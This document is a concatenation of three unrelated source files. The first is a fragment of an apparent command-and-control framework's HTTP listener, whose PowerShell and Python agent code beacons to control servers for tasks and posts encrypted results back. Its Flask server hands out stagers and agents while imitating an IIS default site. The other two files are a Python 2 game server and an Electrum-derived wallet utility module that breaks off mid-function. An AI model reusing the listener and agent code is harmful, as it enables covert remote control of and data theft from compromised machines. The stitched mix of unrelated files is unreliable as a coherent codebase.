"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets.decode('latin-1'))
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8')
headers['Cookie'] = \"""" + self.session_cookie + """session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib.request.urlopen(urllib.request.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
|
server.py | #! /usr/bin/python
import socket
import SocketServer
import threading
import sys
import os
import logging
import struct
import time
# Custom Imports
import world
from commands import *
from shared_functions import *
HOST = ''
PORT = 6699
CURRENT_VERSION = 0x100
logging.basicConfig(
level = logging.DEBUG
)
logger = logging.getLogger()
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
    # NOTE(review): this module is Python 2 only (SocketServer module,
    # str.encode('hex')); it will not run unmodified under Python 3.
    def setup(self):
        # Non-blocking socket: recv raises socket.error (errno 11, EAGAIN)
        # instead of blocking when no data is available.
        self.request.setblocking(0)
    def handle(self):
        # Per-connection loop: read length-prefixed frames and dispatch them
        # until the client disconnects or an error occurs.
        self.server.clients.append(self.request)
        try:
            while True:
                data = ''
                try:
                    # First 4 bytes of every frame are the big-endian length.
                    data = length = self.request.recv(4)
                except socket.error as e:
                    if e.errno == 11:
                        # EAGAIN on the non-blocking socket: poll again.
                        continue
                    raise
                length = ''.join([ c.encode('hex') for c in length ])
                # Deduct the 4 bytes we've just grabbed that contain the
                # length.
                length = int(length, base=16) - 4
                # NOTE(review): if the peer closes mid-frame, recv returns ''
                # and this inner loop spins forever -- confirm intended.
                while length:
                    page = self.request.recv(length)
                    data = data + page if data else page
                    length -= len(page)
                logger.debug(data.encode('hex'))
                self.process_request(data)
        except Exception as e:
            logger.exception('Exception occurred in handle')
        finally:
            #Disconnected.
            self.server.disconnect(self.request)
    def process_request(self, message):
        # Parse the 12-byte header (length, version, command) from a complete
        # frame and dispatch on the command code.
        if not message:
            return
        block = [ c.encode('hex') for c in message ]
        length, version, command = None, None, None
        try:
            length = int(''.join(block[:4]), base=16)
            version = int(''.join(block[4:8]),base=16)
            command = int(''.join(block[8:12]),base=16)
        except:
            #content doesn't match our requests. dump it.
            return
        logger.debug( (version, command) )
        # Per-version decoder table from the commands module.
        decoder = client[version].get(command)
        if command == MOVE:
            # Player moved.
            m = struct.unpack(decoder(len(block[12:])),message)
            m = cleanup(m)
            try:
                move_player(
                    m[3], self.server.world.getPlayer(
                        self.server.clients.index(self.request)
                    )
                )
            except world.MoveException as m:
                # NOTE(review): `as m` rebinds m to the exception; the
                # struct.pack below then indexes m[3] -- confirm
                # MoveException supports that, otherwise this path raises.
                logger.exception('invalid movement for player {}'.format(
                    self.server.world.getPlayer(
                        self.server.clients.index(self.request)
                    ).name
                ))
            # Echo the (validated) move to every other client.
            m = struct.pack(
                server[version][MOVE](len(m[3])), 16+len(m[3]), version,
                MOVE, self.server.clients.index(self.request), m[3]
            )
            self.server.broadcast(self.request,m)
        elif command == PLAYER_CONNECT:
            # They want to know which player they are.
            w = self.server.world.getXMLasString()
            #print( w )
            m = struct.pack(server[version][WORLD](len(w)), 12+len(w), version,
                WORLD, w)
            #world.draw(self.server.world)
            self.sendall(self.request, m)
            m = None
            if len(self.server.clients) < 2:
                # Wait for more players.
                m = struct.pack(
                    server[version][PLAYER_WAIT], 12, version, PLAYER_WAIT
                )
                self.sendall(self.request, m)
            else:
                if not self.server.started:
                    # Start the game.
                    for sock in self.server.clients:
                        p = world.Player(self.server.clients.index(sock), '&',
                            name='Player {}'.format(self.server.clients.index(sock))
                        )
                        self.server.world.addPlayer(p)
                    self.server.started = True
                else:
                    # Game already running: add only the newcomer.
                    p = world.Player(
                        self.server.clients.index(self.request), '&',
                        name='Player {}'.format(self.server.clients.index(self.request))
                    )
                    self.server.world.addPlayer(p)
                # Re-send the updated world to everyone, then tell each
                # client its own player index.
                w = self.server.world.getXMLasString()
                m = struct.pack(server[version][WORLD](len(w)), 12+len(w), version,
                    WORLD, w)
                self.server.broadcast(None, m)
                for sock in self.server.clients:
                    m = struct.pack(
                        server[version].get(command), 16, version, command,
                        self.server.clients.index(sock)
                    )
                    self.sendall(sock, m)
        else:
            # Unknown command: just log the raw hex blocks.
            logger.debug(block)
    def send(self, sock, data):
        # Log outgoing bytes as hex before transmitting.
        logger.debug(data.encode('hex'))
        return sock.send(data)
    def sendall(self, sock, data):
        logger.debug(data.encode('hex'))
        return sock.sendall(data)
class GameServer(SocketServer.ThreadingTCPServer):
    """Threaded TCP game server holding the shared world and client sockets."""
    def __init__(self, server_address, handler_class):
        #super(GameServer,self).__init__(server_address,handler_class)
        SocketServer.ThreadingTCPServer.__init__(self, server_address, handler_class)
        self.clients = []
        self.world = None
        self.newWorld()
        self.started = False
    def newWorld(self):
        # Build a fresh world: rooms first, then connecting corridors.
        self.world = world.World()
        world.buildRooms(self.world, 17, 11, 3)
        c = world.CorridorBuilder(self.world)
        c.generate()
    def startPing(self):
        # Keep-alive broadcaster; daemon thread so it dies with the process.
        self.pingThread = threading.Thread(target=self.pinger)
        self.pingThread.daemon = True
        self.pingThread.start()
    def broadcast(self, omitsock,message):
        # Send `message` to every client except `omitsock`, dropping sockets
        # that turn out to be dead.
        # NOTE(review): this class defines no send(); only the request
        # handler does -- confirm self.send is provided elsewhere, otherwise
        # this raises AttributeError.
        for sock in self.clients:
            if sock != omitsock:
                try:
                    self.send(sock, message)
                except socket.error as e:
                    if e.errno == 9 or e.errno == 32:
                        # Bad file descriptor / broken pipe: client is gone.
                        # NOTE(review): sock.shutdown() without a `how`
                        # argument raises TypeError -- confirm.
                        try:
                            sock.shutdown()
                            sock.close()
                        except:
                            pass
                        finally:
                            self.disconnect(sock)
                    else:
                        raise
    def pinger(self):
        # Periodic keep-alive; `finished` is the module-level shutdown flag
        # set in the __main__ guard.
        p = struct.pack(server[CURRENT_VERSION][PING], 12, CURRENT_VERSION, PING)
        while not finished:
            try:
                self.broadcast(None, p)
            except:
                logger.exception('in ping thread')
            time.sleep(3)
    def disconnect(self, sock):
        # Remove a client: notify peers, clear the player's tile, drop state.
        logger.debug('player disconnected')
        i = self.clients.index(sock)
        m = struct.pack(
            server[CURRENT_VERSION][PLAYER_DISCONNECT], 16,
            CURRENT_VERSION, PLAYER_DISCONNECT, i
        )
        self.broadcast(sock, m)
        p = self.world.players[i]
        y, x = p.getPosition()
        self.world.getMatrix()[y][x] = world.BaseTile()
        del(self.world.players[i])
        self.clients.remove(sock)
        #world.draw(self.world)
def __main__():
    """Create the game server, log its bound address, and serve forever."""
    srv = GameServer((HOST, PORT), ThreadedTCPRequestHandler)
    srv.allow_reuse_address = True
    host_ip, host_port = srv.server_address
    logger.info('Serving on {}:{} in PID: {}'.format(host_ip, host_port, os.getpid()))
    srv.serve_forever()
if __name__ == '__main__':
    # Global flag read by GameServer.pinger and the retry loop below.
    finished = False
    try:
        while not finished:
            try:
                __main__()
            except socket.error as e:
                if e.errno == 98:
                    # 98 == EADDRINUSE on Linux: retry on the next port down.
                    PORT -= 1
                else:
                    raise
    except KeyboardInterrupt as k:
        finished = True
        logger.info('caught ctrl + c')
        sys.exit()
|
util.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
    """Return a new dict mapping each value of *d* back to its key."""
    return dict(zip(d.values(), d.keys()))
# Unit name -> number of decimal places per whole unit.
base_units = {'ZILLA':8, 'mBTC':5, 'bits':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['ZILLA', 'mBTC', 'bits', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
    """Map a decimal-point count to its unit name, e.g. 8 -> 'ZILLA'."""
    name = base_units_inverse.get(dp)
    if name is None:
        raise Exception('Unknown base unit')
    return name
def base_unit_name_to_decimal_point(unit_name: str) -> int:
    """Map a unit name to its decimal-point count, e.g. 'ZILLA' -> 8."""
    dp = base_units.get(unit_name)
    if dp is None:
        raise Exception('Unknown base unit')
    return dp
def normalize_version(v):
    """Parse a dotted version into a list of ints, dropping trailing zero
    components, e.g. '3.2.0' -> [3, 2]."""
    trimmed = re.sub(r'(\.0+)*$', '', v)
    return [int(part) for part in trimmed.split(".")]
# --- Exception hierarchy used across the wallet code ---
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
    def __str__(self):
        return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
    def __str__(self):
        return _("Incorrect password")
class FileImportFailed(Exception):
    # Wraps any error raised while importing metadata from a file.
    def __init__(self, message=''):
        self.message = str(message)
    def __str__(self):
        return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
    # Wraps any error raised while exporting metadata to a file.
    def __init__(self, message=''):
        self.message = str(message)
    def __str__(self):
        return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
    def __init__(self, message=''):
        self.message = str(message)
    def __str__(self):
        # Fall back to a generic translated message when none was supplied.
        if not self.message:
            return _("Operation timed out.")
        return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
    '''An exception that is suppressed from the user'''
    pass
class Satoshis(object):
    """Tag type wrapping an integer satoshi amount for display/JSON purposes."""
    def __new__(cls, value):
        instance = super(Satoshis, cls).__new__(cls)
        instance.value = value
        return instance
    def __repr__(self):
        return 'Satoshis(%d)'%self.value
    def __str__(self):
        return format_satoshis(self.value) + " ZILLA"
class Fiat(object):
    """Tag type wrapping a Decimal fiat amount together with its currency code."""
    def __new__(cls, value, ccy):
        instance = super(Fiat, cls).__new__(cls)
        instance.ccy = ccy
        instance.value = value
        return instance
    def __repr__(self):
        return 'Fiat(%s)'% self.__str__()
    def __str__(self):
        # NaN means "no exchange-rate data available".
        if self.value.is_nan():
            return _('No Data')
        return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
    """JSON encoder aware of Electrum value types (Transaction, Satoshis, Fiat, ...)."""
    def default(self, obj):
        from .transaction import Transaction
        if isinstance(obj, Transaction):
            return obj.as_dict()
        # Satoshis, Fiat and Decimal all serialize via their str() form.
        if isinstance(obj, (Satoshis, Fiat, Decimal)):
            return str(obj)
        if isinstance(obj, datetime):
            # Millisecond precision, space-separated date/time.
            return obj.isoformat(' ')[:-3]
        if isinstance(obj, set):
            return list(obj)
        return super(MyEncoder, self).default(obj)
class PrintError(object):
    '''A handy base class: tagged print helpers, tag defaults to the class name.'''
    def diagnostic_name(self):
        return self.__class__.__name__
    def print_error(self, *msg):
        # only prints with --verbose flag
        prefix = "[%s]" % self.diagnostic_name()
        print_error(prefix, *msg)
    def print_stderr(self, *msg):
        prefix = "[%s]" % self.diagnostic_name()
        print_stderr(prefix, *msg)
    def print_msg(self, *msg):
        prefix = "[%s]" % self.diagnostic_name()
        print_msg(prefix, *msg)
class ThreadJob(PrintError):
    """A job that is run periodically from a thread's main loop. run() is
    called from that thread's context.
    """
    def run(self):
        """Called periodically from the thread"""
        # Subclasses override; the base implementation is a no-op.
        pass
class DebugMem(ThreadJob):
    '''A handy class for debugging GC memory leaks'''
    def __init__(self, classes, interval=30):
        # next_time/interval throttle mem_stats() to once per `interval` seconds.
        self.next_time = 0
        self.classes = classes  # class objects whose live instances get counted
        self.interval = interval
    def mem_stats(self):
        import gc
        self.print_error("Start memscan")
        gc.collect()
        # Group every live object by the first watched class it matches.
        objmap = defaultdict(list)
        for obj in gc.get_objects():
            for class_ in self.classes:
                if isinstance(obj, class_):
                    objmap[class_].append(obj)
        for class_, objs in objmap.items():
            self.print_error("%s: %d" % (class_.__name__, len(objs)))
        self.print_error("Finish memscan")
    def run(self):
        # Called periodically by the owning thread (see ThreadJob/DaemonThread).
        if time.time() > self.next_time:
            self.mem_stats()
            self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
    """ daemon thread that terminates cleanly """
    def __init__(self):
        threading.Thread.__init__(self)
        # current_thread() replaces the deprecated currentThread() alias.
        self.parent_thread = threading.current_thread()
        self.running = False
        self.running_lock = threading.Lock()
        self.job_lock = threading.Lock()
        self.jobs = []
    def add_jobs(self, jobs):
        """Register additional ThreadJob-like objects for run_jobs()."""
        with self.job_lock:
            self.jobs.extend(jobs)
    def run_jobs(self):
        # Don't let a throwing job disrupt the thread, future runs of
        # itself, or other jobs. This is useful protection against
        # malformed or malicious server responses
        with self.job_lock:
            for job in self.jobs:
                try:
                    job.run()
                except Exception:
                    traceback.print_exc(file=sys.stderr)
    def remove_jobs(self, jobs):
        """Unregister previously added jobs (raises ValueError if absent)."""
        with self.job_lock:
            for job in jobs:
                self.jobs.remove(job)
    def start(self):
        with self.running_lock:
            self.running = True
        return threading.Thread.start(self)
    def is_running(self):
        """True until stop() is called, and only while the spawning thread lives."""
        with self.running_lock:
            return self.running and self.parent_thread.is_alive()
    def stop(self):
        with self.running_lock:
            self.running = False
    def on_stop(self):
        # On Android the JNI thread must be detached before the thread exits.
        if 'ANDROID_DATA' in os.environ:
            import jnius
            jnius.detach()
            self.print_error("jnius detach")
        self.print_error("stopped")
# TODO: disable
is_verbose = True

def set_verbosity(b):
    """Toggle the module-wide verbose flag consulted by print_error()."""
    global is_verbose
    is_verbose = b

def print_error(*args):
    """Write *args to stderr, but only when verbose mode is on."""
    if is_verbose:
        print_stderr(*args)

def print_stderr(*args):
    """Write the stringified *args to stderr as one space-joined line."""
    line = " ".join(str(item) for item in args)
    sys.stderr.write(line + "\n")
    sys.stderr.flush()

def print_msg(*args):
    """Write the stringified *args to stdout as one space-joined line."""
    line = " ".join(str(item) for item in args)
    sys.stdout.write(line + "\n")
    sys.stdout.flush()
def json_encode(obj):
    """Serialize *obj* to pretty-printed JSON via MyEncoder; fall back to repr()."""
    try:
        return json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
    except TypeError:
        return repr(obj)
def json_decode(x):
    """Parse JSON from *x* with floats as Decimal; return *x* unchanged on failure."""
    try:
        return json.loads(x, parse_float=Decimal)
    except (ValueError, TypeError):
        # ValueError covers json.JSONDecodeError; TypeError covers non-string
        # input. The previous bare `except:` also hid programming errors.
        return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
    """Return True if the two strings are equal, False otherwise."""
    # Delegates to hmac.compare_digest for a timing-attack-resistant compare;
    # inputs may be str or bytes (to_bytes below normalizes to UTF-8 bytes).
    return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
    """Decorator: log the wrapped function's wall-clock run time via print_error.

    Unlike the previous lambda-based version, functools.wraps preserves the
    wrapped function's __name__/__doc__ for debugging and introspection.
    """
    from functools import wraps
    @wraps(func)
    def wrapper(*args, **kw_args):
        t0 = time.time()
        result = func(*args, **kw_args)
        elapsed = time.time() - t0
        print_error("[profiler]", func.__name__, "%.4f" % elapsed)
        return result
